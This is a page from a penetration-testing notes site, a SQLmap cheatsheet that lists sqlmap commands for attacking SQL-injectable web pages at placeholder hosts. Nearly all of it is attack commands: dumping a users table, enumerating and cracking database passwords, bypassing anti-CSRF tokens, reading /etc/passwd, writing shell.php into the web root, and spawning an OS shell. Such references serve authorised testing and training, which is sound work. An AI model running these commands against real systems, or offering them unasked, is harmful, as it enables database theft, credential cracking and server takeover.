Staphysec
  • StaphySec
  • Resources
  • Tricks
  • Brute Force - CheatSheet
  • File Transfer
    • Windows File Transfer
    • Linux File Transfer
    • HTTP/SMB/Nginx/Web Servers/Netcat
  • Hashcat
  • Cheatsheet
  • Curl
  • Tools
    • Cracking
    • Information Gathering
    • XSS
    • Obfuscation
    • Credentials Theft/ Win
    • Content Management Systems (CMS)
  • Programming and Scripting
    • Virtualenv & Switching Versions
    • Python
  • SHELLS
    • Shells (Linux, Windows, Msfvenom)
  • Linux
    • CheatSheet
    • EOP Linux Tools and Resources
    • Blogs
  • Windows
    • CheatSheet
    • EOP Windows Tools and Resources
    • Useful commands and Modules
    • Active Directory
      • Tools
  • Blogs
    • Miscellaneous resources
  • PENTESTING
    • 21 - Pentesting FTP
    • 22 - Pentesting SSH
    • 25,465,587 - Pentesting SMTP
    • 53 - Pentesting DNS
    • 110,995 - Pentesting POP
    • 135 - Pentesting WMI
    • 139,445 - SMB Pentesting
    • 143,993 - Pentesting IMAP
    • 161,162,10161,10162/udp - Pentesting SNMP
    • 623/UDP/TCP - IPMI
    • 1433 - Pentesting mssql
    • 2049 - NFS Pentesting
    • 3306 - Pentesting Mysql
    • 3389 - Pentesting RDP
    • 5985,5986 - WinRm
  • Pentesting Web
    • SQL Injections
      • MySQL injection
      • SQLmap Cheatsheet
    • Command injections
    • File Uploads
    • Abusing Intermediary Applications
    • HTTP Verb Tampering
    • IDOR
    • File Inclusion / Directory Traversal
    • XXE - XEE - XML External Entity
    • SSRF
    • SSI/ESI
    • SSTI (Server Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
Powered by GitBook
On this page
  1. Pentesting Web
  2. SQL Injections

SQLmap Cheatsheet

PreviousMySQL injectionNextCommand injections

Last updated 3 years ago

Command 	Description
sqlmap -h 	View the basic help menu
sqlmap -hh 	View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch 	Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' 	SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' 	POST request specifying an injection point with an asterisk
sqlmap -r req.txt 	Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' 	Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT 	Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt 	Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch 	Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" 	Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 	Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba 	Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb 	Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname 	Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" 	Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema 	Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user 	Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch 	Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" 	Anti-CSRF token bypass
sqlmap --list-tampers 	List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba 	Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" 	Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" 	Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell 	Spawning an OS shell
Hacktricks